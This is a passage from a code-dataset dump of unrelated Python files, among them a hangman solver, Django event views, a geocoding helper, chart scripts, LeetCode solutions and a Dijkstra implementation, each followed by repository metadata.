self.testidx:\n feat = self._load(self.features[idx])\n labs = self.labels_multihot[idx]\n yield np.array(feat), np.array(labs), self.features[idx]\n","sub_path":"ucf_dataset.py","file_name":"ucf_dataset.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"11172682","text":"import re, os, sys, multiprocessing, glob, operator\nfrom random import randint\n\nre_letters_pattern = r\"[^a-zA-Z]\"\n# Working directory\ncur_dir = os.getcwd()\n# Paths to directories storing files with words\npath_to_final = cur_dir + \"/final/*\"\npath_to_misc = cur_dir + \"/misc/*\"\n\n# Here we'll store all the paths to files with words\npath_to_files = []\nfor fname in glob.glob(path_to_final):\n path_to_files.append(fname)\n\nfor fname in glob.glob(path_to_misc):\n path_to_files.append(fname)\n\nword_bank = []\n\n# Here we go to each file and add the words line by line to word_bank\nfor file_path in path_to_files:\n f = open(file_path, encoding = \"ISO-8859-1\")\n for line in f:\n word_bank.append(re.sub(re_letters_pattern, '', line).lower())\n f.close()\n\n# We'll probably blow up the world if we print the list, so let's print the length\nprint(\"\\nSearching through: {} words\\n\".format(len(word_bank)))\n\n\n\n# Function Definition Area\n\ndef doesNotContain(word, _list):\n for letter in word:\n for bad_letter in _list:\n if letter == bad_letter:\n return False\n return True\n\ndef isProperLength(word, length):\n return len(word) == length\n\ndef letters_match(word, letters):\n for i in range(0, len(letters)):\n if letters[i] != '_':\n if word[i] != letters[i]:\n return False\n return True\n# Inspired by the example that if the known is as_, the word can't be ass because the second s would already be there\ndef as_test(word, known):\n known = known.replace('_', '')\n\n word_list = []\n known_list = []\n for letter in word:\n word_list.append(letter)\n for letter in known:\n known_list.append(letter)\n\n #print(word_list)\n #print(known_list)\n\n for letter in known_list:\n index = word_list.index(letter)\n del word_list[index]\n\n #print(word_list)\n #print(known_list)\n\n for letter in known_list:\n if letter in word_list:\n return False\n return True\n\ndef fits_rules(word, exclude_list, known):\n word_length = len(known)\n return isProperLength(word, word_length) and (letters_match(word, known) and (doesNotContain(word, exclude_list) and as_test(word, known)))\n\ndef get_letter_freq(possible_words, known):\n known = known.replace('_', '')\n return_dict = dict()\n \n for pos_word in possible_words:\n pos_word_list = []\n known_list = []\n for letter in pos_word:\n pos_word_list.append(letter)\n for letter in known:\n known_list.append(letter)\n for letter in known_list:\n index = pos_word_list.index(letter)\n del pos_word_list[index]\n for letter in pos_word_list:\n if letter in return_dict:\n return_dict[letter] = return_dict[letter] + 1\n else:\n return_dict[letter] = 1\n sorted_dict = sorted(return_dict.items(), key=operator.itemgetter(1))\n sorted_dict.reverse()\n return sorted_dict\n \ndef get_possible_word(exclude_list, known):\n word_length = len(known)\n possible_words = []\n for word in word_bank:\n if fits_rules(word, exclude_list, known):\n if word in possible_words:\n #print(\"\\nCalculating...\\n\")\n pass\n else: \n possible_words.append(word) \n\n exclude_string = \"\"\n for letter in exclude_list:\n exclude_string += \"{}, \".format(letter)\n exclude_string += \":\"\n if len(exclude_list) == 0:\n exclude_string = \"no letters:\"\n\n print(\"========================\")\n\n print(\"Here are all the possible words for {} excluding {}\\n\".format(known, exclude_string))\n print(possible_words)\n\n print(\"\\nThere are {} out of {} possible words\\n\".format(len(possible_words), len(word_bank)))\n\n print(\"\\nPossible Word Frequencies\\n\")\n letter_freqs = get_letter_freq(possible_words, known)\n for arr in letter_freqs:\n print(\"{}: {}\".format(arr[0], arr[1]))\n print(\"I suggest guessing {}\".format(letter_freqs[0][0]))\n\ndef get_possible_word_comp(exclude_list, known):\n num = 1\n while len(known.replace('_', '')) == 0:\n guess = numToLet(num)\n while guess in exclude_list:\n num += 1\n guess = numToLet(num)\n return {\n 'guess': guess\n }\n print(exclude_list)\n word_length = len(known)\n possible_words = []\n for word in word_bank:\n if fits_rules(word, exclude_list, known):\n if word in possible_words:\n pass\n else: \n possible_words.append(word) \n\n letter_freqs = get_letter_freq(possible_words, known)\n # Prints the letter freqs\n for arr in letter_freqs:\n print(\"{}: {}\".format(arr[0], arr[1]))\n # Filters the ltter freqs for suggestions\n i = 0\n guess = letter_freqs[i][0]\n print(\"I will guess {}\".format(guess))\n print(exclude_list)\n print(guess)\n while in_list(exclude_list, guess):\n print(\"Oh wait it's in the exclusion list\")\n i += 1\n guess = letter_freqs[i][0]\n print(\"I will not guess {}\".format(guess))\n return {\n 'guess': guess\n }\n\ndef numToLet(num):\n lets = {\n 1: 'a',\n 2: 'b',\n 3: 'c',\n 4: 'd',\n 5: 'e',\n 6: 'f',\n 7: 'g',\n 8: 'h',\n 9: 'i',\n 10: 'j',\n 11: 'k',\n 12: 'l',\n 13: 'm',\n 14: 'n',\n 15: 'o',\n 16: 'p',\n 17: 'q',\n 18: 'r',\n 19: 's',\n 20: 't',\n 21: 'u',\n 22: 'v',\n 23: 'w',\n 24: 'x',\n 25: 'y',\n 26: 'z'\n }\n return lets[num]\ndef in_list(_list, _thing):\n print(_list)\n for x in _list:\n if _thing == x:\n return True\n return False\n\ndef generate_random_word():\n random_word = word_bank[randint(0, len(word_bank) - 1)]\n word_to_pass = \"\"\n for i in random_word:\n word_to_pass += \"_\"\n return (random_word, word_to_pass)\n\ndef is_solved(word_to_guess, bot_input):\n return word_to_guess == bot_input\n\ndef input_guess(word_to_guess, ignore_list, guess, current_word):\n original_word = word_to_guess\n original_word = original_word.replace(guess, '&')\n re_occur_pattern = r\"[^&]\"\n occurances = len(re.sub(re_occur_pattern, '', original_word))\n if occurances == 0:\n ignore_list.append(guess)\n for loop in range(0, occurances):\n print(\"\\nLoop\\n\")\n print(\"Original Word: {}\".format(original_word))\n print(\"Word To Guess: {}\".format(word_to_guess))\n print(\"Current Word: {}\".format(current_word))\n index = original_word.index('&')\n print(\"Index: {}\".format(index))\n original_word = str_to_list(original_word)\n current_word = str_to_list(current_word)\n print(\"Original Word: {}\".format(original_word))\n print(\"Current Word: {}\".format(current_word))\n \n original_word[index] = guess\n current_word[index] = guess\n \n original_word = list_to_str(original_word)\n current_word = list_to_str(current_word)\n print(\"Original Word: {}\".format(original_word))\n print(\"Current Word: {}\".format(current_word))\n print(\"\")\n print(ignore_list, current_word)\n return (ignore_list, current_word)\n\ndef str_to_list(_str):\n _list = []\n for letter in _str:\n _list.append(letter)\n return _list\n\ndef list_to_str(_list):\n _str = \"\"\n for letter in _list:\n _str += letter\n return _str\n\n#get_possible_word(['k'], '_o__')\ndef play_game():\n gen = generate_random_word()\n word_to_guess = gen[0]\n bot_input = gen[1]\n ignore_list = []\n\n print(\"Chosen word is {}\".format(word_to_guess))\n bot_output = \"a\"\n \n while is_solved(word_to_guess, bot_input) is False:\n print(\"Passing on {} to bot\".format(bot_input))\n bot_output = get_possible_word_comp(ignore_list, bot_input)\n print(\"Robot guessed {}\".format(bot_output[\"guess\"]))\n ig = input_guess(word_to_guess, ignore_list, bot_output[\"guess\"], bot_input)\n ignore_list = ig[0]\n bot_input = ig[1]\n \n#print(get_possible_word_comp(['i', 'o', 'r', 't', 'n'], 'apple'))\nplay_game()\n","sub_path":"src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":8265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"630171049","text":"import numpy as np\r\nimport torch\r\nimport torchvision.transforms.functional as F \r\n\r\ndef readAsTensor(path):\r\n with open(path) as f:\r\n content = f.readlines()\r\n\r\n (input_size, output_size,) = [int(a) for a in content[0].split('\\t')]\r\n content = [[float(a) for a in x.strip().split('\\t')] for x in content[1:]]\r\n\r\n return np.array(content, np.float32), input_size, output_size\r\n\r\nclass Normalizer:\r\n def __init__(self, input_size):\r\n self.mean = torch.empty(input_size, dtype = torch.float32)\r\n self.std = torch.empty(input_size, dtype = torch.float32)\r\n pass\r\n\r\n def load_state_dict(self, state_dict):\r\n self.mean = state_dict['mean']\r\n self.std = state_dict['std']\r\n\r\n def initialize(self, dataset):\r\n input_size = self.mean.shape[0]\r\n self.mean = dataset[:, 0:input_size].mean(0)\r\n self.std = dataset[:, 0:input_size].std(0)\r\n\r\n def apply(self, dataset):\r\n input_size = self.mean.shape[0]\r\n dataset[:, 0:input_size].sub_(self.mean.view(1, -1)).div_(self.std.view(1, -1))\r\n return dataset\r\n \r\n def state_dict(self):\r\n return {\r\n 'mean': self.mean,\r\n 'std': self.std,\r\n }\r\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"623825627","text":"import requests\n\napi_url= \"https://maps.googleapis.com/maps/api/geocode/json?address={}&key=\"\n\ndef getLocation(address):\n url = api_url.format(address)\n res = requests.get(url)\n location_dict = res.json()\n lat = location_dict['results'][0]['geometry']['location']['lat']\n lng = location_dict['results'][0]['geometry']['location']['lng']\n cityID = location_dict['results'][0]['address_components'][-1]['short_name']\n res.close()\n return lat, lng, cityID\n\nlat, lng, cityID = getLocation(\"台北市大同區民生西路\")\n\nprint(lat)\nprint(lng)\nprint(cityID)\n\npostalCode = {\n \"中正區\": 100, \"大同區\": 103, \"中山區\": 104, \"松山區\": 105, \"大安區\": 106, \"萬華區\": 108, \"信義區\": 110,\n \"士林區\": 111, \"北投區\": 112, \"內湖區\": 114, \"南港區\": 115, \"文山區\": 116, \"萬里區\": 207, \"金山區\": 208,\n \"板橋區\": 220, \"汐止區\": 221, \"深坑區\": 222, \"石碇區\": 223, \"瑞芳區\": 224, \"平溪區\": 226, \"雙溪區\": 227,\n \"貢寮區\": 228, \"新店區\": 231, \"坪林區\": 232, \"烏來區\": 233, \"永��區\": 234, \"中和區\": 235, \"土城區\": 236,\n \"三峽區\": 237, \"樹林區\": 238, \"鶯歌區\": 239, \"三重區\": 241, \"新莊區\": 242, \"泰山區\": 243, \"林口區\": 244,\n \"蘆洲區\": 247, \"五股區\": 248, \"八里區\": 249, \"淡水區\": 251, \"三芝區\": 252, \"石門區\": 253\n}\n","sub_path":"test_code/googleLocation.py","file_name":"googleLocation.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"398399985","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# If this is a web application, set the remote host here\nremotehost = \"\"\n\nimport sys\nimport os\nimport dabo.ui\nfrom dabo.dLocalize import _\n# The loading of the UI needs to happen before the importing of the\n# db, biz, and ui packages:\ndabo.ui.loadUI(\"wx\")\n\nif sys.platform == \"windows\":\n\tdabo.MDI = True\n\nif sys.platform == \"darwin\":\n\tdabo.MDI = True\n# hack for locale error on OSX\n# import locale\n# locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')\nimport db\nimport biz\nimport ui\nimport reports\n\n# included for PyInstaller\n#import wx.gizmos, wx.lib.calendar \n\nfrom App import App\napp = App(SourceURL=remotehost)\napp.db = db\napp.biz = biz\napp.ui = ui\napp.reports = reports\n\n# Make it easy to find any images or other files you put in the resources\n# directory.\nsys.path.append(os.path.join(app.HomeDirectory, \"resources\"))\n\napp.setup()\napp.MainFormClass = app.ui.FrmMain\napp.PreferenceManager.setValue(\"fontsize\", 11)\napp.NoneDisplay = \"\"\n# Set up a global connection to the database that all bizobjs will share:\napp.dbConnection = app.getConnectionByName(\"WBSRemoteUser\")\n#app.dbConnection.LogEvents = ['All']\n\n\n# Open one or more of the defined forms. A default one was picked by the app\n# generator, but you can change that here. Additionally, if form names were\n# passed on the command line, they will be opened instead of the default one\n# as long as they exist.\napp.ui.AnswersForm = dabo.ui.createClass(\"ui//AnswersForm.cdxml\")\napp.ui.CommentsForm = dabo.ui.createClass(\"ui//CommentsForm.cdxml\")\napp.ui.ContactsForm = dabo.ui.createClass(\"ui//ContactsForm.cdxml\")\napp.ui.GradesForm = dabo.ui.createClass(\"ui//GradesForm.cdxml\")\napp.ui.LessonsForm = dabo.ui.createClass(\"ui//LessonsForm.cdxml\")\napp.ui.StudentsForm = dabo.ui.createClass(\"ui//StudentsForm.cdxml\")\napp.ui.TeachersForm = dabo.ui.createClass(\"ui//TeachersForm.cdxml\")\napp.ui.PrintOrPreviewForm = dabo.ui.createClass(\"ui//PrintOrPreviewForm.cdxml\")\napp.ui.LessonSelector = dabo.ui.createClass(\"ui//LessonSelector.cdxml\")\napp.ui.CommentSelectorForm = dabo.ui.createClass(\"ui//CommentSelectorForm.cdxml\")\napp.DefaultForm = app.ui.StudentsForm\napp.FormsToOpen = [app.DefaultForm]\napp.startupForms()\nif app.MainForm != None:\n\tapp.MainForm.Caption = 'WBSTools version ' + str(app.getAppInfo('appVersion'))\n# Start the application event loop:\napp.start()\n","sub_path":"WBSTools.py","file_name":"WBSTools.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"436237548","text":"from pyecharts import Line\nline = Line(\"折线图--面积实例\",'hello')\n\n#data\nattr = [\"{}\".format(n) for n in range(1,7)]\nv1 = [5, 20, 36, 10, 75, 90]\nv2 = [10, 25, 8, 60, 20, 80]\n\n# 填充 不透明性 填充颜色 节点标注\nline.add(\"one\",attr,v1,is_fill=True,line_opacity=0.2,area_opacity=0.4,area_color='yellow',is_label_show=True)\n #平滑曲线\nline.add(\"two\",attr,v2,is_fill=True,line_opacity=0.8,area_opacity=0.2,area_color='green',is_smooth=True)\n\nline.render(r'C:\\Users\\Administrator\\Desktop\\数据可视化\\pyecharts\\html\\12.html')","sub_path":"数据可视化/pyecharts/12折线面积图.py","file_name":"12折线面积图.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"492812184","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@Author : richardchien\n@Date : 2020-04-14 21:59:54\n@LastEditors: yanyongyu\n@LastEditTime: 2020-04-14 22:12:11\n@Description : None\n@GitHub : https://github.com/richardchien\n\"\"\"\n__author__ = \"richardchien\"\n\nfrom nonebot import CommandGroup\n\n__plugin_name__ = \"bilibili\"\n\n\ndef __plugin_usage__(target, *args, **kwargs):\n if target == \"name\":\n return \"📺 bilibili番剧\"\n else:\n return \"📺 bilibili番剧\\n\\n最近有什么番\\n2018年1月有什么番\\nJOJO的奇妙冒险更新了没有\"\n\n\ncg = CommandGroup(\"bilibili_anime\")\n\nfrom . import commands, nlp\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"251567393","text":"class Solution:\n def reverseWords(self, s: str) -> str:\n #count the space\n num = s.count(\" \")\n sentence = s.split(\" \",num+1)\n sentence.reverse()\n out = \"\"\n while '' in sentence:\n sentence.remove('')\n for i in sentence:\n print(i)\n out = out + i + \" \"\n #print(out.count(' '))\n return out[:-1]","sub_path":"151.py","file_name":"151.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"642223404","text":"from django.utils.translation import ugettext_lazy as _\n\nfrom django.contrib import messages\nfrom django.contrib.auth import logout as logout_user\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect, reverse\nfrom django.http import HttpResponse, JsonResponse\nfrom django.utils import timezone\n\nfrom events.models.events import Event, CommonEvent, EventPhoto, Place, Attendee\nfrom events.models.profiles import Team, Organization, UserProfile, Member\nfrom events.forms import TeamEventForm, NewTeamEventForm, DeleteEventForm, EventCommentForm, NewPlaceForm, UploadEventPhotoForm, NewCommonEventForm\nfrom events import location\n\nimport datetime\nimport simplejson\n\n# Create your views here.\ndef events_list(request, *args, **kwargs):\n if not request.user.is_authenticated:\n return redirect('all-events')\n events = Event.objects.filter(attendees=request.user.profile, end_time__gt=timezone.now()).order_by('start_time')\n geo_ip = location.get_geoip(request)\n context = {\n 'active': 'my',\n 'events_list': sorted(events, key=lambda event: location.event_distance_from(geo_ip.latlng, event)),\n }\n return render(request, 'get_together/events/list_events.html', context)\n\ndef events_list_all(request, *args, **kwargs):\n events = Event.objects.filter(end_time__gt=timezone.now()).order_by('start_time')\n geo_ip = location.get_geoip(request)\n context = {\n 'active': 'all',\n 'events_list': sorted(events, key=lambda event: location.event_distance_from(geo_ip.latlng, event)),\n }\n return render(request, 'get_together/events/list_events.html', context)\n\ndef show_event(request, event_id, event_slug):\n event = Event.objects.get(id=event_id)\n comment_form = EventCommentForm()\n context = {\n 'team': event.team,\n 'event': event,\n 'comment_form': comment_form,\n 'is_attending': request.user.profile in event.attendees.all(),\n 'attendee_list': Attendee.objects.filter(event=event),\n 'can_edit_event': request.user.profile.can_edit_event(event),\n }\n return render(request, 'get_together/events/show_event.html', context)\n\n@login_required\ndef create_event_team_select(request):\n teams = request.user.profile.moderating\n if len(teams) == 1:\n return redirect('create-event', team_id=teams[0].id)\n\n return render(request, 'get_together/events/create_event_team_select.html', {'teams': teams})\n\n@login_required\ndef create_event(request, team_id):\n team = Team.objects.get(id=team_id)\n if not request.user.profile.can_create_event(team):\n messages.add_message(request, messages.WARNING, message=_('You can not create events for this team.'))\n return redirect('show-team', team_id=team.pk)\n\n new_event = Event(team=team, created_by=request.user.profile)\n\n\n if request.method == 'GET':\n if 'common' in request.GET and request.GET['common'] != '':\n new_event.parent = CommonEvent.objects.get(id=request.GET['common'])\n form = NewTeamEventForm(instance=new_event)\n\n context = {\n 'event': new_event,\n 'team': team,\n 'event_form': form,\n }\n return render(request, 'get_together/events/create_event.html', context)\n elif request.method == 'POST':\n if 'common' in request.POST and request.POST['common'] != '':\n new_event.parent = CommonEvent.objects.get(id=request.POST['common'])\n form = NewTeamEventForm(request.POST, instance=new_event)\n if form.is_valid:\n new_event = form.save()\n Attendee.objects.create(event=new_event, user=request.user.profile, role=Attendee.HOST, status=Attendee.YES)\n return redirect('add-place', new_event.id)\n else:\n context = {\n 'event': new_event,\n 'team': team,\n 'event_form': form,\n }\n return render(request, 'get_together/events/create_event.html', context)\n else:\n return redirect('home')\n\ndef add_event_photo(request, event_id):\n event = Event.objects.get(id=event_id)\n if not request.user.profile.can_edit_event(event):\n messages.add_message(request, messages.WARNING, message=_('You can not make changes to this event.'))\n return redirect(event.get_absolute_url())\n\n if request.method == 'GET':\n form = UploadEventPhotoForm()\n\n context = {\n 'event': event,\n 'photo_form': form,\n }\n return render(request, 'get_together/events/add_photo.html', context)\n elif request.method == 'POST':\n new_photo = EventPhoto(event=event)\n form = UploadEventPhotoForm(request.POST, request.FILES, instance=new_photo)\n if form.is_valid():\n form.save()\n return redirect(event.get_absolute_url())\n else:\n context = {\n 'event': event,\n 'photo_form': form,\n }\n return render(request, 'get_together/events/add_photo.html', context)\n else:\n return redirect('home')\n\ndef add_place_to_event(request, event_id):\n event = Event.objects.get(id=event_id)\n if not request.user.profile.can_edit_event(event):\n messages.add_message(request, messages.WARNING, message=_('You can not make changes to this event.'))\n return redirect(event.get_absolute_url())\n\n if request.method == 'GET':\n form = NewPlaceForm()\n\n context = {\n 'event': event,\n 'place_form': form,\n }\n return render(request, 'get_together/places/create_place.html', context)\n elif request.method == 'POST':\n form = NewPlaceForm(request.POST)\n if form.is_valid:\n if request.POST.get('id', None):\n form.instance.id = request.POST.get('id')\n new_place = form.save()\n event.place = new_place\n event.save()\n return redirect('share-event', event.id)\n else:\n context = {\n 'event': event,\n 'place_form': form,\n }\n return render(request, 'get_together/places/create_place.html', context)\n else:\n return redirect('home')\n\ndef share_event(request, event_id):\n event = Event.objects.get(id=event_id)\n context = {\n 'event': event,\n }\n return render(request, 'get_together/events/share_event.html', context)\n\ndef edit_event(request, event_id):\n event = Event.objects.get(id=event_id)\n\n if not request.user.profile.can_edit_event(event):\n messages.add_message(request, messages.WARNING, message=_('You can not make changes to this event.'))\n return redirect(event.get_absolute_url())\n\n if request.method == 'GET':\n form = TeamEventForm(instance=event)\n\n context = {\n 'team': event.team,\n 'event': event,\n 'event_form': form,\n }\n return render(request, 'get_together/events/edit_event.html', context)\n elif request.method == 'POST':\n form = TeamEventForm(request.POST,instance=event)\n if form.is_valid:\n new_event = form.save()\n return redirect(new_event.get_absolute_url())\n else:\n context = {\n 'team': event.team,\n 'event': event,\n 'event_form': form,\n }\n return render(request, 'get_together/events/edit_event.html', context)\n else:\n return redirect('home')\n\ndef delete_event(request, event_id):\n event = Event.objects.get(id=event_id)\n if not request.user.profile.can_edit_event(event):\n messages.add_message(request, messages.WARNING, message=_('You can not make changes to this event.'))\n return redirect(event.get_absolute_url())\n\n if request.method == 'GET':\n form = DeleteEventForm()\n\n context = {\n 'team': event.team,\n 'event': event,\n 'delete_form': form,\n }\n return render(request, 'get_together/events/delete_event.html', context)\n elif request.method == 'POST':\n form = DeleteEventForm(request.POST)\n if form.is_valid() and form.cleaned_data['confirm']:\n team_id = event.team_id\n event.delete()\n return redirect('show-team', team_id)\n else:\n context = {\n 'team': event.team,\n 'event': event,\n 'delete_form': form,\n }\n return render(request, 'get_together/events/delete_event.html', context)\n else:\n return redirect('home')\n\ndef show_common_event(request, event_id, event_slug):\n event = CommonEvent.objects.get(id=event_id)\n context = {\n 'org': event.organization,\n 'common_event': event,\n 'can_edit_event': False,\n }\n return render(request, 'get_together/orgs/show_common_event.html', context)\n\n@login_required\ndef create_common_event(request, org_slug):\n org = Organization.objects.get(slug=org_slug)\n if not request.user.profile.can_create_common_event(org):\n messages.add_message(request, messages.WARNING, message=_('You can not create events for this org.'))\n return redirect('show-org', org_id=org.pk)\n\n new_event = CommonEvent(organization=org, created_by=request.user.profile)\n if request.method == 'GET':\n form = NewCommonEventForm(instance=new_event)\n\n context = {\n 'org': org,\n 'event_form': form,\n }\n return render(request, 'get_together/orgs/create_common_event.html', context)\n elif request.method == 'POST':\n form = NewCommonEventForm(request.POST, instance=new_event)\n if form.is_valid:\n new_event = form.save()\n return redirect('show-common-event', new_event.id, new_event.slug)\n else:\n context = {\n 'org': org,\n 'event_form': form,\n }\n return render(request, 'get_together/orgs/create_common_event.html', context)\n else:\n return redirect('home')\n\ndef share_common_event(request, event_id):\n event = CommonEvent.objects.get(id=event_id)\n context = {\n 'event': event,\n }\n return render(request, 'get_together/orgs/share_common_event.html', context)\n\n@login_required\ndef create_common_event_team_select(request, event_id):\n teams = request.user.profile.moderating\n if len(teams) == 1:\n return redirect(reverse('create-event', kwargs={'team_id':teams[0].id}) + '?common=%s'%event_id)\n context = {\n 'common_event_id': event_id,\n 'teams': teams\n }\n return render(request, 'get_together/orgs/create_common_event_team_select.html', context)\n\n\n","sub_path":"get_together/views/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":10719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"113430998","text":"from recommendation.common.models import Segment\n\nclass BasicIndexPOI(object):\n def __init__(self,id,longitude,latitude,tag):\n self.id = id\n self.longitude = float(longitude)\n self.latitude = float(latitude)\n self.tag = tag\n\nclass OrderIndexPOI(object):\n def __init__(self, id, longitude, latitude, tag, hot):\n self.id = id\n self.longitude = float(longitude)\n self.latitude = float(latitude)\n self.tag = tag\n self.hot = hot\n\nclass LocationIndexPOI(BasicIndexPOI):\n def __init__(self,id,longitude,latitude,tag,rank,roads,type):\n super(LocationIndexPOI,self).__init__(id,longitude,latitude,tag)\n self.rank = rank\n self.roads = roads\n self.type = type\n\nclass POI(BasicIndexPOI):\n def __init__(self,id,longitude,latitude,tag,rank,code,mdistance,board,off,mlong,mlat):\n super(POI,self).__init__(id,longitude,latitude,tag)\n self.tag = tag\n self.rank = rank\n self.code = code\n self.mdistance = mdistance\n self.board = board\n self.off = off\n self.mlong = mlong\n self.mlat = mlat\n\nclass RoadIndexPOI():\n def __init__(self, segment, type):\n self.segment = segment\n self.type = type\n\nclass EBoardPOI():\n def __init__(self,longitude,latitude,r_longitude,r_latitude):\n self.longitude = longitude\n self.latitude = latitude\n self.r_longitude = r_longitude\n self.r_latitude = r_latitude\n\nclass Record:\n def __init__(self, pid, longitude1, latitude1, longitude2, latitude2, poi):\n #self.id = long(pid)\n self.id = 1\n self.coordinate = (float(longitude1),float(latitude1),float(longitude2),float(latitude2))\n self.poi = poi\n\n\n\n","sub_path":"recommendation/offline/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"243187453","text":"def soma(lista):\n total = 0\n for elem in lista:\n total += elem\n return total\n\ndef media(lista):\n return soma(lista)/len(lista)\n\ndef distintos(lista):\n for i in range(len(lista)):\n for j in range(i + 1, len(lista)):\n if (lista[i] == lista[j]):\n return False\n return True\n\ndef maior(lista):\n aux = lista[0]\n for i in range(1, len(lista)):\n if (lista[i] > aux):\n aux = lista[i]\n return aux\n\ndef menor(lista):\n aux = lista[0]\n for i in range(1, len(lista)):\n if (lista[i] < aux):\n aux = lista[i]\n return aux\n\ndef ordenado(lista):\n for i in range(len(lista) - 1):\n if (lista[i] > lista[i + 1]):\n return False\n return True\n","sub_path":"semana_13/exercicios/funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"249559945","text":"'''\n最长公共前缀\n编写一个函数来查找字符串数组中的最长公共前缀。\n如果不存在公共前缀,返回空字符串 \"\"。\n示例 1:\n输入:strs = [\"flower\",\"flow\",\"flight\"]\n输出:\"fl\"\n示例 2:\n输入:strs = [\"dog\",\"racecar\",\"car\"]\n输出:\"\"\n解释:输入不存在公共前缀。\n\n考查标签 字符串\n'''\n\n\n# 方法一:横向扫描\n\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n if not strs: # 若列表为空 则返回空,即输入不存在公共前缀\n return \"\"\n\n def lcp(str1, str2):\n length = min(len(str1), len(str2))\n index = 0\n while index < length and str1[index] == str2[index]:\n index += 1\n return str1[:index]\n\n pre = strs[0]\n len_str1 = len(strs)\n for i in range(1, len_str1):\n pre = lcp(pre, strs[i])\n if not pre: # 当不存在公共前缀时,则剪枝,不进行后续的循环判断\n break\n return pre\n\n\n'''\n代码讲解网址:\nhttps://leetcode-cn.com/problems/longest-common-prefix/solution/zui-chang-gong-gong-qian-zhui-by-leetcode-solution/\n'''\n","sub_path":"腾讯/数组与字符串/最长公共前缀.py","file_name":"最长公共前缀.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"552498901","text":"#!/usr/bin/env python3\n\nfrom configparser import ConfigParser\nfrom shutil import copyfile\nimport os\n\nHOME = os.path.expanduser(\"~\")\n\nDEFAULT_CFG_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '../ShowControl/default.cfg'))\n\nCFG_DIR = HOME + '/.showcontrol'\nCFG_PATH = CFG_DIR + '/config.cfg'\n\n\ndef checkUserConf():\n newcfg = True\n if(not os.path.exists(CFG_PATH)):\n if(not os.path.exists(CFG_DIR)):\n os.makedirs(CFG_DIR)\n else:\n default = ConfigParser()\n default.read(DEFAULT_CFG_PATH)\n current = ConfigParser()\n current.read(CFG_PATH)\n if('Version' in current):\n newcfg = current['Version']['Number'] != default['Version']['Number']\n if(newcfg):\n copyfile(CFG_PATH, CFG_PATH + '.old')\n print('Old configuration file backup -> ' + CFG_PATH + '.old')\n\n if(newcfg):\n copyfile(DEFAULT_CFG_PATH, CFG_PATH)\n print('Create configuration file -> ' + CFG_PATH)\n else:\n print(\"Configuration is up to date\")\n\ncheckUserConf()\n\nconfig = ConfigParser()\nconfig.read(CFG_PATH)\nconfig.keys()\n\n\ndef toDict():\n conf_dict = {}\n for key in config.keys():\n conf_dict[key] = {}\n for skey in config[key].keys():\n conf_dict[key][skey] = config[key][skey]\n return conf_dict\n\n\ndef updateFromDict(conf):\n for key in conf.keys():\n for skey in conf[key].keys():\n config[key][skey] = conf[key][skey]\n\n\ndef write():\n with open(CFG_PATH, 'w') as cfgfile:\n config.write(cfgfile)\n","sub_path":"CueEngine/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"153767672","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nfrom typing import List\nimport pytest\n@pytest.fixture(scope='session',autouse=True)\ndef status():\n print(\"开始测试\")\n yield\n print(\"结束测试\")\ndef pytest_collection_modifyitems(\n session: \"Session\", config: \"Config\", items: List[\"Item\"]\n) -> None:\n \"\"\"\n 用例结果显示汉字\n \"\"\"\n for item in items:\n\n item.name = item.name.encode('utf-8').decode('unicode-escape')\n item._nodeid = item.nodeid.encode('utf8').decode('unicode-escape')\n","sub_path":"api/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"187018199","text":"import sys\nclass Graph:\n def __init__(self,vertices):\n self.V = vertices\n self.graph = [[0 for i in range(vertices)] for j in range(vertices)]\n \n def findMin(self,visited,cost):\n min_cost = sys.maxsize\n for i in range(0,self.V):\n if(not visited[i] and min_cost>cost[i]):\n min_cost = min(min_cost,cost[i])\n min_index = i\n return min_index\n def dijkstra(self,source):\n visited = [False]*(self.V)\n cost = [sys.maxsize]*(self.V)\n\n cost[source] = 0\n for i in range(0,self.V):\n min_vertex = self.findMin(visited,cost)\n visited[min_vertex] =True\n for j in range(0,self.V):\n if(not visited[j] and self.graph[min_vertex][j]>0):\n cost[j] = min(cost[j],self.graph[min_vertex][j] + 